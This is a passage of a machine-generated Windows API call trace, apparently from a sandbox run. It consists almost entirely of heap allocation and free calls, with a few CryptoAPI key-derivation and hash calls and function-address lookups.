RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0181.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0181.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0181.460] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0181.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0181.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0181.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0181.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0181.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0181.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0181.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0181.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0181.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0181.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0181.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0181.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0181.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0181.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0181.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0181.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0181.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0181.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0181.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0181.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0181.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0181.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0181.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0181.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0181.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0181.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0181.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0181.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0181.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0181.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0181.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0181.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0181.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0181.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0181.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0181.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0181.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0181.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0181.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0181.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0181.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0181.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0181.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0181.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0181.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0181.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0181.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0181.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0181.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0181.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0181.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0181.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0181.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0181.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0181.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0181.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0181.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd420 [0181.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3f0 [0181.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0181.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0181.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0181.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0181.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4e0 [0181.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0181.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fd0 [0181.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd960 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4f8 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd540 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0181.467] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0181.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda68 [0181.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0181.467] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0181.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0181.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0181.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0181.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0181.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0181.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0181.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0181.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0181.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0181.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0181.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0181.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0181.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0181.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0181.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0181.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0181.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0181.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0181.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0181.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0181.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0181.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0181.469] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0181.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0181.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0181.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0181.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0181.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0181.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0181.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0181.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0181.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d4a0 [0181.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d4a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0181.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0181.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0181.470] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0181.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0181.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0181.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0181.470] CryptDestroyHash (hHash=0x90af58) returned 1 [0181.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0181.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0181.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0181.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0181.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 